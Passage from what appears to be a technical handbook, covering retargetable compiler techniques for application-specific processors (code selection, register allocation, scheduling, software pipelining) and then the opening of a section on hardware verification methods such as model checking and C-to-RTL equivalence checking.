code. The vector multiplier is a two-cycle pipelined multiplier. VU2 is a dedicated
functional unit for implementing special radix computations.
The ASIP has two separate vector memories that can be accessed in parallel: DM
for data and CM for coefficients. Each memory comes with its own AGU (not shown
in the figure), supporting indirect addressing modes with pointer post-modifications.
The ASIP’s heterogeneous storage architecture is visible in the figure. Multiple
small register files of different sizes are locally connected to inputs and outputs of
functional units. Register files V[] and T[] are both partitioned in a lower and a
higher sub-range with half the number of fields. While some instructions can access
the full register file, others can only access sub-ranges (as indicated by black, red,
and blue colors in the figure).
The ASIP supports instruction-word parallelism in up to five parallel slots: three
slots, one dedicated to each of the functional units, and two slots dedicated to memory
loads and stores. The ASIP has variable-length instructions, shown in Fig. 7.
A 64-bit instruction format is used to encode instructions with five slots. A shorter
32-bit format is used to encode stand-alone (i.e., nonparallel) instructions for
control, memory loads and stores, and vector operations. Finally, a 16-bit format
is used for stand-alone scalar RISC instructions.
The ASIP has a four-stage instruction pipeline, composed of an instruction fetch,
an instruction decode, and two execution stages.
Fig. 7 Instruction formats of the example ASIP for FFT and DFT
Retargetable Compilers for ASIPs
While a retargetable compiler for ASIPs may reuse elements from estab-
lished compiler frameworks, its architecture and technology will differ in multiple
respects:
• The processor target itself is captured in a dedicated IR, and code generation can
be viewed as mapping the (application) IR onto the processor IR. Processor IRs
are discussed below in section “Processor Intermediate Representations”.
• Optimization algorithms must be available that directly work on the processor
IR, and thus are applicable to any architecture that is described therein, cov-
ering the full scope of ASIP architectures, and that result in highly efficient
machine code. This mostly pertains to the back end of the compiler, which in
traditional compilers is often custom-made for the processor target. Optimization
algorithms in retargetable compilers are discussed below in section “Retargetable
Compiler Optimizations”.
Processor Intermediate Representations
Compiler frameworks like GCC and LLVM provide internal data structures that can
be refined and tuned by compiler engineers to capture information about the specific
processor target.
In case of LLVM, these data structures are C++ classes that can be specialized
per processor target, referred to as target description classes (LLVM Project n.d.-d).
The main class TargetMachine provides virtual methods to access processor-
specific information from more specific classes that contain information on parts
of the processor. Examples of such specific classes include TargetInstrInfo
(describing the target’s instructions), TargetRegisterInfo (describing its register
files), and TargetLowering (describing which operations and datatypes are legal
on the target).
As illustrated by the LLVM example above (and the same holds for GCC),
the processor IR in established compiler frameworks consists of a collection of
multiple representations, each geared at a different phase in the back end of the
compiler. By splitting information over multiple representations, some redundancy
is introduced which bears a risk of inconsistencies and thus may require extra
design and verification effort. Also, such a split poses some challenges in coping
with phase coupling efficiently. Besides this, the information in LLVM’s processor
IR is somewhat geared to general-purpose CPU architectures, which requires a
customization effort to support alternative architectures such as ASIPs.
While the information in the processor IR of LLVM or GCC can be understood
and entered by compiler engineers, this is less obvious for architecture
designers, who would benefit from retargetable compilation for architectural
exploration. Also, it is not straightforward to automatically generate a processor
IR in this format from an ADL that describes complete ASIP architectures from the
ground up. For ASIP architectures that are based on a predefined processor template
to which extension instructions can be added using an ADL, such an approach is
feasible though. An example of the latter is the Xtensa C compiler, which is based on
LLVM (Cadence n.d.-b), with automatic support of extension instructions defined
in the TIE ADL (Sanghavi and Andrews 2008).
Early research in retargetable compilers already explored alternative processor
IRs with the intention to generate them from an ADL. Among the more successful
examples is the instruction-set graph (ISG) model (Van Praet 1997), a graph-based
processor IR of which Fig. 9 shows an example:
• Nodes representing storage elements are depicted as boxes with a black bound-
ary. They are labeled with the name of the storage, followed by its primitive data
type (between brackets). A distinction is made between “static” storages (nodes
with blue labels), which hold data until explicitly overwritten, and “transitory”
storages (nodes with black labels), which only hold data for a fixed time. Static
storages include controllable registers and memories. Transitory storages include
pipeline registers that have one cycle delay and wires (nets) that have zero delay.
• Nodes representing operations are depicted as colored boxes. The green boxes
represent primitive functions, and the red boxes represent data move operations.
They are labeled with a name and annotated with enabling conditions. The latter
are compact representations of the different binary encodings of the instruction
word that can enable the operation.
• Directed edges representing the connectivity are depicted in black. Combined,
these edges indicate how data can flow from storage, through operations, to
storage.
Retargetable Compiler Optimizations
In this section, the different compilation phases are reviewed as already introduced
in section “Compilation Phases and Dependencies”, but now from an ASIP per-
spective. Additional requirements are described for these phases, and how they
can be handled in a retargetable compiler that targets the broad scope of ASIP
architectures described in section “Architectural Scope of ASIPs”. Compared to
compilers for general-purpose CPUs, the most important differences can be found
in the retargetable back end of the compiler. Optimization algorithms in the
back end operate on a detailed model of the processor architecture coded in a
processor IR that is automatically constructed from an ADL, such that the compiler
retargets instantaneously whenever changes are made to the ADL. The feature of
retargetability should however not compromise the generated machine code quality,
i.e., the code quality is expected to approximate that of custom-made compilers for
the same processor target.
The above example illustrates that ASIPs with SIMD support are often pro-
grammed by explicitly specifying vector datatypes in the application source code,
together with overloaded operators and intrinsic functions on those vector datatypes.
This is an elegant programming style that is well accepted, because at the time
when a SIMD ASIP is conceived, designers often have good insight into how the
reference code of their applications can be vectorized. As mentioned in section
“Middle End”, the compiler research community recently revisited the topic of auto-
vectorization. As many ASIPs have SIMD capabilities, auto-vectorization could be
a useful feature in a compiler for ASIPs. Current state-of-the-art techniques can
handle basic use cases, with code consisting of nested loops with data-independent
bounds. For practical use, more research is needed on this topic.
The fragment below, excerpted from the vectorized DFT example referred to above,
illustrates the explicit vector programming style, using the vector datatype vcmplx_t,
restrict-qualified pointers, and intrinsic functions such as vmodule5io() and virdx():

vmodule5io(i0,i1,i2,i3,i4,t0,t1,t2,t3,t4,select_tc(c,0),cselect_tc(c,2),select_tc(c,0));
t0 = t0 * pTwid[0*stepn]; o0 = virdx(t0,mrRS);
t1 = t1 * pTwid[1*stepn]; o1 = virdx(t1,mrRS);
t2 = t2 * pTwid[2*stepn]; o2 = virdx(t2,mrRS);
t3 = t3 * pTwid[3*stepn]; o3 = virdx(t3,mrRS);
t4 = t4 * pTwid[4*stepn]; o4 = virdx(t4,mrRS);
pTwid++;
vcmplx_t* restrict p0 = pOut; p0[0*stepn] = o0;
vcmplx_t* restrict p1 = pOut; p1[1*stepn] = o1;
vcmplx_t* restrict p2 = pOut; p2[2*stepn] = o2;
vcmplx_t* restrict p3 = pOut; p3[3*stepn] = o3;
vcmplx_t* restrict p4 = pOut; p4[4*stepn] = o4;
pOut++;
}
}
Besides supporting application-specific datatypes, operators, and intrinsic
functions, C++ has also become popular as an application source-code language for
ASIPs because a growing number of C++ software libraries are becoming available
for application domains for which ASIPs are a popular implementation target.
Examples include OpenCV (computer vision), TensorFlow Lite for Microcontrollers
(machine learning), and Eigen and Blaze (vector arithmetic and linear algebra).
Front ends of established compiler frameworks like GCC and especially LLVM
are mostly independent of the processor target, and can therefore be used in
retargetable compilers for ASIPs. Their existing support of C++ is beneficial
in an ASIP context, as explained above. Moreover, leveraging LLVM’s modular
architecture, the LLVM engineering community recently saw increased interest
in research and development of front ends for new domain-specific programming
languages. Examples of such languages include OpenMP (Chandra et al. 2001)
and OpenCL (Kaeli et al. 2012) (parallel programming), SYCL (Reinders et al.
2021) (heterogeneous system programming), Rust (Klabnik and Nichols 2018)
(memory-safe systems programming), and Halide (Ragan-Kelley et al. 2013)
(image processing).
Note though that standard releases of the GCC and LLVM front ends today may
not be applicable to ASIPs without modifications. Since GCC and LLVM were
originally targeting general-purpose CPUs, several of the typical characteristics
of CPUs are reflected in the implementation of these tools, including their front
end. See the introduction of section “Architectural Scope of ASIPs” for a list of
such characteristics. LLVM’s Clang front end has been extended by certain ASIP
tool vendors to alleviate the restrictions originating from the general-purpose CPU
model (Synopsys 2020).
Source-Code Annotations
The implementation of software code on ASIP architectures often must meet
constraints that are imposed by the system in which the ASIP is embedded. One
example is real-time constraints, where the rate at which certain input data are
consumed or output data are produced may not be lower than a specified bound,
or the input-output delay (also called latency) may not exceed a specified bound.
Another example is I/O constraints, i.e., input or output data may have to be stored
in designated memory locations or communicated via designated I/O ports.
Such constraints and other application properties can be conveyed to the compiler
through annotations, such as pragmas, in the source code. The compiler can use this
information in the instruction scheduling phase in the back end, to apply more
effective software pipelining (see section “Instruction Scheduling”).
Code Selection
In the code selection phase in the back-end stage, the compiler recognizes patterns of
operations in the application IR that each can be implemented in a single instruction
on the processor target. Such patterns are operation bundles. Typically, these
bundles take the form of directed acyclic graphs (DAGs), with nodes representing
operations and edges indicating data or control dependencies. If the application
IR is a CDFG then the bundles are subgraphs within the CDFG. Compiler
frameworks store the set of patterns that are supported by the target in a data
structure (see LLVM’s TargetLowering class in section “Processor Intermediate
Representations”). In a retargetable compiler that uses a graph-based processor IR,
the valid patterns can be determined by analyzing this processor IR, which is also a
DAG (see, e.g., the ISG representation of Fig. 9).
Code selection consists of two subtasks. The first subtask, called matching,
determines possible matches of DAG patterns from the application IR to the
processor IR. The second subtask, called covering, then selects a set of matched
DAGs from the processor IR that covers the complete application IR.
Once code selection has been completed, the application IR is updated such that
the selected bundles become single objects. For example, if the application IR uses
a DFG representation, the nodes in the DFG now represent bundles, and the edges
represent data dependencies between inputs and outputs of these bundles.
DAG matching and DAG covering are both NP-complete problems. To ensure
low computation time, compilers apply heuristic methods.
Many traditional compilers use heuristics that transform DAGs into trees.
The advantage is that tree matching and tree covering can be solved in linear
time. Both subtasks can now be performed by tree automata for which dynamic
programming techniques are frequently used, certainly in case of general-purpose
CPU architectures (Aho et al. 1989; Fraser et al. 1992). However, as discussed in
section “Specialization”, ASIP architectures typically have a heterogeneous storage
architecture, and instructions can be subject to register-file sub-range and coupling
constraints. For these reasons, code selectors for ASIPs are better off performing the
matching and covering steps directly on DAG patterns.
As an illustration, Fig. 11 shows a few practical examples of DAG patterns that
can be implemented on specific instructions in ASIPs. The pattern on the left maps
onto an indirect load instruction from a data memory (DM) with a postincrement
of the address pointer (ptr). The address pointer is a common input of the load and
postincrement operations, which makes the pattern a DAG instead of a tree. DAG
matching ensures that the load and postincrement operations are always performed
in the same instruction cycle, as a result of which the pointer must not be stored
for more than one cycle and thus only a single pointer register is required for
consecutive loads. The pattern on the right maps onto a full-precision multiply-add-
saturate instruction, as in the expression d = sat(a*b + c). The multiply operation
has two outputs, representing low- and high-order bits. The add operations have two
Fig. 11 Example DAG patterns supported by specific instructions: (a) Indirect load with address
postincrement; (b) Multiply-add-saturate instruction on a saturating MAC functional unit with low
and high parts
outputs, representing data bits and carryout flags. Such operations with multiple
outputs result in DAG patterns.
ASIP Designer uses a code selection technique that directly operates on DAGs,
based on the work presented in (Van Praet 1997). Alternative approaches operating
on DAGs have been proposed in more recent literature, e.g., (Ertl 1999; Ebner et al.
2008).
Register Allocation
Programming languages like C and C++ distinguish between the following types
of variables:
• Global variables: These are defined outside of functions, and always exist.
• Static variables: These are declared with the static keyword, and exist across
function calls.
• Local variables (also called automatic variables): These only exist in the
function in which they are defined.
Register allocation deals mainly with local variables, including the temporary
variables that hold intermediate results of the operation bundles
that have been created in the code selection phase (section “Code Selection”). They
are best kept in registers as much as possible, but due to register capacity limitations
the compiler may decide to temporarily move them to memory. This is referred to
as register spilling. If the processor supports a software stack in memory, spilled
variables will be stored in a dedicated part of the software stack frame called the
spill area.
General-purpose CPUs typically have a single central register file of which all
the register fields are equally accessible as inputs (sources) or outputs (destinations)
of operation bundles. In that case, what remains to be done is to select a register
field in the central register file, for each local variable. This task is referred to as
register assignment. It is discussed separately in section “Register Assignment”.
ASIPs with a heterogeneous storage architecture can have multiple register files
of different sizes that are connected to specific inputs or outputs of functional
units. Register allocation then becomes a more complex task that must consider
aspects like interconnectivity, capacity constraints of each register file, and register-
file access restrictions for individual instructions (e.g., sub-range access or register
coupling: see the discussion on connectivity and storage architecture in section
“Specialization”).
Consider the example ASIP of Fig. 12. The three diagrams show alternative
register allocations for a local variable that is produced on the shifter unit (SH)
and consumed as an input to the multiplier unit (MPY).
• In the left-hand diagram the variable is stored in the single output register of
the shifter, and in a later cycle moved via the result bus to the input port of the
multiplier for immediate consumption. While this solution looks straightforward,
it may be inefficient in case the result bus is heavily loaded by other instructions.
In that case the compiler would have to delay the multiply operation by several
cycles, meanwhile blocking the ALU/shifter unit.
• In the middle diagram the variable is again stored in the output register of the
shifter. In a subsequent cycle it is moved via an operand bus to an input register of
the multiplier. Only in a third cycle is it consumed by the multiplier. Even though
this solution requires an additional move instruction, it may be more efficient if
the load on the operand bus is lower than that on the result bus.
• The right-hand diagram shows a solution that is beneficial if the production of the
variable occurs early, and its consumption occurs late in the program. To avoid
blocking registers during its long live range, the variable is spilled to the data
memory, where it can reside during many cycles. Just prior to consumption, it is
loaded into an input register of the multiplier and subsequently consumed.
Fig. 12 Three alternative register allocation solutions for the same local variable, in an ASIP with
a heterogeneous storage architecture
Register Assignment
Register assignment refers to the selection of individual register fields for local
variables allocated to register files. This is a well-understood problem in compiler
theory. It is assumed that (at least approximate) scheduling of instructions has been
done (see section “Instruction Scheduling”) so that live ranges of local variables are
known.
Variables with overlapping live ranges cannot be assigned to the same register
field. Such constraints can be represented as edges in an undirected graph, called
interference graph, in which the nodes represent the variables. The register assign-
ment problem can then be solved as a graph coloring problem (Chaitin 1982; Briggs
et al. 1994).
Register capacity limitations imply that only a limited number of colors may be
used. When no solution can be found with the given number of colors, heuristic
methods have been described to apply local transformations in the application IR,
resulting in reduced interference. Examples include the introduction of spilling, the
recomputation of certain variables, and live range splitting (Keith et al. 1998). The
latter refers to making copies of variables that each have a shorter live range and
therefore can be assigned more effectively.
The heterogeneous storage architecture of typical ASIP architectures further
complicates the register assignment task, e.g., to take into account access restrictions
within register files as discussed under connectivity and storage architecture in
section “Specialization”.
Instruction Scheduling
During instruction scheduling, the compiler decides on which control step the
operation bundles will be executed. The optimization objective typically is to obtain
the lowest cycle count for executing the application, but in certain contexts the
smallest code size in program memory may be desired instead.
To deal with phase coupling, some compilers will insert multiple scheduling
phases, e.g., computing an approximate schedule prior to register assignment and
an exact schedule after register assignment.
If the processor supports instruction-word parallelism, which is the case with
most ASIPs, the scheduler is expected to fill the parallel slots with operation
bundles as much as possible. The scheduler must respect all data dependencies (i.e.,
variables can only be consumed after they have been produced) as well as anti-
dependencies (i.e., variables cannot be overwritten before their last consumption).
As an illustration, Fig. 13 lists a fragment of the machine code for the DFT
prime-factor algorithm, generated by ASIP Designer’s retargetable compiler, for
the example ASIP introduced in section “Example”.
Fig. 13 Fragment of compiler-generated machine code for the DFT prime-factor algorithm, on
the ASIP of section “Example”
For reference, the five slots of
the ASIP’s parallel instructions are printed at the top. The three-digit numbers at the
far left are program counter (PC) values. In addition to radix calculation operation
bundles, the VU2 slot also encodes control operations. At PC value 407 it contains
a zero-overhead loop operation (shown in red) with two delay slots and PC end
address 429. This means that the loop body ranges from PC values 410 to 429
(shown in red). It can be noted that the compiler was able to fill the parallel slots
well. The DM slot is entirely filled in the loop body, i.e., there are no “no-operation”
(nop) codes, which implies that the loop body has been scheduled optimally.
In sections of code that have been scheduled aggressively, the processor cannot
accept interrupts. This can be easily understood from the right-hand diagram in
Fig. 14: if an interrupt must be serviced between the depicted instruction using slot
1 and the one using slot 0, the anti-dependency can no longer be satisfied. Some
compilers automatically ensure that interrupts are masked during the execution of
such code sections (Goossens 2021).
Aggressive scheduling reduces the register pressure. As such, for a given small
register set, it can produce more compact schedules with a lower cycle count. For
this reason, it is frequently used in ASIPs with instruction-word parallelism.
Table 1 compares the cycle count obtained with standard and aggressive schedul-
ing of FFT algorithms of different sizes on the example ASIP of section “Example”
(with a four-stage instruction pipeline), using ASIP Designer’s compiler (Goossens
2021). The average cycle count gain in these examples is 22%. Higher relative gains
can be obtained on ASIPs with deeper pipelines.
Software Pipelining
Software pipelining is a code transformation step in the scheduling phase that is
supported by many compilers targeting processors with instruction-word paral-
lelism, when the application code contains for-loops (Rau and Glaeser 1981; Lam
1988; Goossens et al. 1989). It applies to both zero-overhead loops and software
loops implemented through conditional branching. The compiler will try to move
operations from one loop iteration to a subsequent one, where they can fill slots that
would otherwise remain unused.
Fig. 15 Compiled machine-code fragments of covariance function with two nested loops, on an
ASIP with no instruction-word parallelism (left) and on an ASIP with four slots of instruction-word
parallelism where the inner loop has been software pipelined (right)
As illustrated in Fig. 15, the same covariance code compiles quite differently on an
ASIP without instruction-word parallelism and on an ASIP with
specialization and with four slots of instruction-word parallelism. The compiler has
applied software pipelining to the inner for-loop, resulting in a compact schedule
of only two cycles per loop iteration. The compiler inserted so-called prolog and
epilog code before and after the loop, to ensure correct initialization and termination
of the software pipeline. The compiler may try to schedule prolog and epilog code
in parallel with application code that precedes or succeeds the loop body.
Software pipelining is often applied to the innermost loop of each loop nest in the
application code. Compilers may also attempt to apply software pipelining at higher
levels of loop nests (Muthukumar and Doshi 2001). This is often beneficial because,
as illustrated by the triangular shapes in Fig. 15 (right), the slot utilization of a
loop’s prolog and epilog is typically quite complementary, so that moving epilog
code to the beginning of the next iteration of the higher-level loop will result in a
higher slot utilization in the higher-level loop body and thus a further cycle count
reduction. This is typically at the expense of larger code size, because the compiler
now must insert extensive prolog and epilog code for the higher-level loop as well.
Alternatively, if the processor supports predicated execution, the instructions in the
loop can be predicated to obtain the required prolog and epilog functionality in the
initial and final iterations.
Scheduling Techniques
Various instruction scheduling algorithms are being applied in compilers. Examples
include:
• List scheduling: While its origins go back a long time (Fisher 1979), list
scheduling continues to be popular in modern compilers (a sketch of its core loop
follows after this list). It is a greedy algorithm
that processes control steps from low to high (or the other way round). At every
control step a list of yet unscheduled operation bundles is composed that are
not data dependent on yet-to-be-scheduled bundles. Bundles from the list are
assigned to the current control step based on a priority function, provided they do
not conflict with other bundles already assigned to this control step. Bundles can
be conflicting for various reasons: they may use the same functional unit(s), write
to the same register port(s), or require incompatible opcode bit settings in the
instruction word. Various priority functions have been proposed, and compilers
may combine them to find more optimal solutions (De Micheli 1994). More
recently, machine learning techniques have been proposed to derive optimized
priority functions for list scheduling (Malik et al. 2008).
• Trace scheduling is an algorithm that was originally developed for VLIW
architectures (Ellis 1986). It places more focus on control-flow aspects of
the application. It repeatedly chooses a frequently executed path through the
application’s control-flow graph called a trace, schedules it as compactly as pos-
sible, and then performs extra bookkeeping to glue adjacent traces consistently
together.
• One approach to software pipelining is to use iterative list scheduling (Lam 1988; Goossens et al. 1989).
In each iteration step of the algorithm, a new list schedule is computed for the
loop body. At the end of each step, heuristics are applied to select operation
bundles from the obtained schedule and move them to a different loop iteration,
resulting in a modified loop body that can potentially be scheduled in fewer
cycles. The process repeats until no further reduction of the cycle count for the
loop body can be found.
• Iterative modulo scheduling is another approach to software pipelining (Rau
1994). This algorithm is also iterative, but instead of trying to reduce the cycle
count for the loop body in consecutive iterations, iterative modulo scheduling
starts from a precomputed lower bound on the cycle count (referred to as the
minimum initiation interval) and tries to schedule the loop body within that
bound. This may not be successful. In successive iterations, the bound is then
increased and the core scheduling algorithm is reapplied until a solution is
found. The core scheduling algorithm picks operation bundles based on a priority
function and assigns them to control steps within the allowed initiation interval.
The control step is chosen depending on the already assigned control steps for
other bundles. An important difference with list scheduling is that control step
assignments can be undone during this process.
Extensions to modulo scheduling have been proposed. Swing modulo schedul-
ing is an extension that tries to minimize the live ranges of variables in the loop,
which helps to improve phase coupling with the register assignment phase in the
compiler (Llosa et al. 1996).
Conclusions
The electronics industry of the twenty-first century continues to see strong growth
of smart connected products implemented in heterogeneous multicore SoCs. This
trend is fueled by the development of novel and more application-specific processor
architectures (ASIPs), characterized by increasing amounts of parallelism and
specialization. Such advanced processors require efficient design tools, including
compilers to develop application software.
While software compilation is an engineering discipline with a long history,
today’s context brings new challenges for compiler developers. Compilers must be
able to exploit the features of highly specialized architectures and must become
available quickly, preferably in co-development with the processor architecture
so that early compilation of application code can provide feedback to drive
architectural decisions. Retargetable compilation is an engineering domain that
received renewed attention in view of the above trends and requirements.
This chapter discussed concepts, challenges, and solutions in the domain of
retargetable compilation. While visible as an academic research topic in the 1990s,
continued developments in retargetable compilation meanwhile resulted in several
successful commercial deployments in the context of ASIP design tools. As
described in this chapter, retargetable compilers for ASIPs reuse several concepts
from the more established field of compiler construction. A selection of references
to the compiler construction literature has been provided, which is necessarily
incomplete due to the long history of this field. Retargetable compilers however
also differ from standard compilers in multiple respects. True retargetable compilers
read a processor model expressed in an ADL. In addition to a somewhat conventional
application IR, retargetable compilers also use a processor IR that is automatically
constructed from the ADL. The ADL and the processor IR must be able to capture
a wide architectural scope of ASIPs, which can differ significantly from general-
purpose processor architectures. Optimizations in a retargetable compiler directly
operate on both the application IR and the processor IR, and require sophistication
in order to deliver production quality code for each ASIP that can be modeled.
Retargetable compilation is expected to receive continued and renewed interest
from the research community in the next decade. Initiatives like RISC-V are
promoting the diversification and specialization of processor architectures, and thus
of ASIPs. Next-generation smart SoC design projects in industry will see an even
stronger need for more advanced ASIP architectures. In addition to supporting
advanced processor cores, compilers will have to cope with multicore aspects.
Another evolution is the emergence of domain-specific programming languages,
with first industry successes in domains like machine learning and advanced vision
systems. While domain-specific language front ends are emerging, efficient phase
coupling with retargetable compiler back ends will be required to ensure that the
overall resulting tool chain can produce production quality code.
Retargetable compilers may be considered as today’s most successful incarnation
of “hardware/software co-design,” a concept that was coined already at the end of
the twentieth century.
Acknowledgments The authors express their appreciation to the reviewers and to their colleague
Sven Wuytack for their constructive feedback on this chapter.
References
Aho AV, Sethi R, Ullman JD (1986) Compilers: principles, techniques and tools. Addison-Wesley,
Reading
Aho AV, Ganapathi M, Tjiang SWK (1989) Code generation using tree matching and dynamic
programming. ACM Trans Program Lang Syst
Aho AV, Lam MS, Sethi R, Ullman JD (2007) Compilers: principles, techniques and tools.
Pearson/Addison-Wesley
Allen R, Kennedy K (1987) Automatic transformations of FORTRAN programs to vector form.
ACM Trans Program Lang Syst
Allen R, Kennedy K (2001) Optimizing compilers for modern architectures. Morgan Kaufmann
Arm, Arm compiler for embedded, https://developer.arm.com/tools-and-software/embedded/arm-
compiler
Arm-KEIL, Embedded development tools, https://www.keil.com
Bik AJC, Girkar M, Grey PM, Tian X (2002) Automatic intra-register vectorization for the Intel
architecture. Int J Parallel Program
Briggs P, Cooper KD, Torczon L (1994) Improvements to graph coloring register allocation.
ACM Trans Program Lang Syst
Brockmeyer E (2010) Design of an ASIP for DFT/FFT. Technical Report, Target Compiler
Technologies
Cadence, Tensilica offerings: development toolchain, https://www.cadence.com/en_US/home/
tools/ip/tensilica-ip/technologies.html
Cadence, Tensilica controllers and extensible processors, https://www.cadence.com/en_US/home/
tools/ip/tensilica-ip/tensilica-xtensa-controllers-and-extensible-processors.html
CEVA (2020) CEVA-ToolBox Software Development Suite, https://www.ceva-dsp.com/wp-
content/uploads/2020/11/07_11_20_ToolBox_Product_Note_EN-V2.pdf
Chaitin GJ (1982) Register allocation & spilling via graph coloring. Proc ACM SIGPLAN Symp
on Compiler Construction
Chandra R, Menon R, Dagum L, Kohr D, Maydan D, McDonald J (2001) Parallel programming in
OpenMP. Morgan Kaufmann Publishers
Codasip, Codasip RISC-V Processors, Product documentation, https://codasip.com/products/
codasip-risc-v-processors
Codasip, Codasip Studio, Product documentation, https://codasip.com/products/codasip-studio/
Cytron R, Ferrante J, Rosen BK, Wegman MN, Zadeck FK (1991) Efficiently computing
static single assignment form and the control dependence graph. ACM Trans Program Lang Syst
De Micheli G (1994) Synthesis and optimization of digital circuits. McGraw-Hill
Dennis JB (2011) Data flow graphs. In: Padua D (ed) Encyclopedia of parallel computing. Springer
Dobbelaere J (2019) RFC: Full ‘restrict’ support in LLVM, https://lists.llvm.org/pipermail/llvm-
dev/2019-March/131127.html
Ebner D, Brandner F, Scholz B, Krall A, Wiedermann P, Kadlec A (2008) Generalized instruction
selection using SSA-graphs. Proc. ACM SIGPLAN/SIGBED Conf. on Lang., Compilers and
Tools for Embedded Systems
Ellis JR (1986) Bulldog: a compiler for VLIW architectures. The MIT Press
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1192
Formal Verification, Simulation, and Emulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1193
Outline of the Section . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1194
Section Organization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1195
Bit-Level Model Checking Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1195
C-to-RTL Equivalence Checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1195
Symbolic Simulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1197
Mechanical Theorem Proving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1197
Versatile Binary-Level Concolic Testing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1198
Information Flow Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1198
Verification of Quantum Circuit Design Flows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1199
Discussion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1199
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1201
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1201
S. Ray
Intel Corporation, San Jose, CA, USA
e-mail: [email protected]

Abstract

… aspect of computer architecture. The chapters under this section should help
a computer architect understand the challenges and opportunities in verifying
complex systems, and, in turn, this could influence his or her design decisions.
Introduction
Design houses have integrated such third-party software along with their home-grown
automated verification methodologies in various phases of their design cycles.
Despite such progress, automated verification is far from being a “solved
problem.” The primary reason behind this is the complexity of modern computers.
To meet this challenge, verification algorithms have to be more efficient and
scalable. But it can be argued that clever design of verification algorithms alone
cannot bridge the gap—a better understanding of the design space is needed
so that it can be effectively partitioned into smaller modules, which can be
handled by the automation tools. For this, a deeper synergy between the design
community and the verification community is needed. Both teams need to
understand the other team's language, prerequisites, and constraints. Architects and
micro-architects can benefit from rigorous verification by adopting it not only for
demonstrating their designs' correctness but also as a methodology for designing
modules with verifiable interfaces. This improves the composability of modules into
Systems-on-Chip (SoCs), thereby improving the verifiability of the latter. This seems
to be a promising approach for reducing bug escapes while developing complex
computers under time-to-market pressure. It is, therefore, useful for the architecture
community to understand how the available verification techniques work, what
their limitations are, and how architects may collaborate with the verification teams
to improve the coverage of verification for their designs.
With a vision of bringing the communities of architects and validators closer,
this section presents a spectrum of verification techniques that have become the
preferred solutions for a practicing verification engineer for different verification
problems. Computer-aided verification has a rich theory whose foundation was
laid by pioneers such as Alan Turing, Alonzo Church, and Kurt Gödel in the
1930s. The subject received a major boost from the 1970s onward with the seminal
contributions of Amir Pnueli, Edmund Clarke, E. Allen Emerson, Joseph Sifakis,
and their contemporaries. An interested reader may want to consult books such as
Clarke et al. (2018a,b) and Baier and Katoen (2008) for comprehensive discussions
of the theoretical underpinnings of computer-aided verification. This section of the
handbook focuses instead on particular aspects of automated verification that have
been distilled over time into practical and useful techniques that are actively
deployed by the semiconductor industry in design cycles.
Computers are composed of hardware and software; the latter includes application
software and system software. While bug escape in any of these components can
lead to failure of the whole system, computer architects are usually concerned
with bugs in hardware and system software. This section, therefore, focuses
on techniques that are practiced to verify hardware, system software, and their
interactions. As hinted at the beginning of this section, verification techniques
are broadly classified into two types: static techniques and dynamic techniques.
Static techniques are performed during the compilation of the design source code
and do not involve running the code on test inputs. Static techniques mostly
apply mathematical reasoning to the structure of the design to infer its logical
correctness. Due to their strong association with formal logic, many of these
techniques are classified under formal verification techniques. Dynamic techniques,
on the other hand, involve running the source code of the design on a designated
set of inputs, and the resulting outputs are checked against the expected behavior.
Such techniques are broadly called testing. Computers are subjected to two types
of testing—simulation testing and emulation testing. Computer hardware is
developed in high-level hardware description languages such as Verilog, VHDL, or
SystemVerilog. These languages come with run-time simulation environments
so that modules developed in them can be simulated using test inputs. This type
of dynamic verification of hardware is called simulation testing. It offers a flexible,
low-cost, and quick way of verifying whether a module is behaving in the right way.
Simulation is a great way of finding bugs in a module. However, if it does not find
a bug with the designated set of test vectors, that does not guarantee that the module
is bug-free in general. Also, RTL simulation becomes prohibitively slow when
applied at the system level. To alleviate the latter problem, practitioners resort to
emulation testing, where the RTL design is synthesized onto reconfigurable hardware
platforms, and the resulting hardware configuration is executed against the test
inputs. Emulation can achieve a significant speedup so that it can scale to large
system-level designs, which are beyond the reach of simulation.
Section Organization
helps gain similar confidence in the latter. Due to the popular choice of C as the
high-level modeling language, this problem is commonly called C-to-RTL equivalence
checking in the industry. Chapter "C-to-RTL Equivalence Checking" discusses
various challenges and opportunities of this important problem and available
solutions to it.
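To make the flavor of this check concrete, the following minimal sketch builds a "miter" between an untimed C-style specification and an RTL-style shift-and-add implementation and discharges it with an SMT solver. The example uses the Z3 Python API (package z3-solver); the two one-line "designs" are invented for illustration and stand in for the word-level models that an industrial C-to-RTL tool would extract.

from z3 import BitVec, Solver, unsat

x = BitVec('x', 8)
spec = 3 * x            # untimed C-level specification: y = 3*x
impl = (x << 1) + x     # RTL-style shift-and-add implementation

# Miter: the designs are equivalent iff no input drives them apart.
s = Solver()
s.add(spec != impl)
if s.check() == unsat:
    print("designs are equivalent for all inputs")
else:
    print("mismatch found:", s.model())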
Symbolic Simulation
Model checking and equivalence checking are two major pillars of automated
verification of hardware systems. They are general purpose and fully automated,
require minimal human intervention, and produce counterexamples that expose the
root cause of violations. This has led to their successful adoption in industry—
multiple commercial vendors provide state-of-the-art model checkers and equiva-
lence checkers today and design houses have absorbed them successfully in their
verification flows. While widely successful in their practical applications, their
performance is somewhat limited by the generality of their back-end algorithms.
For example, commercial model checkers support verification of any temporal
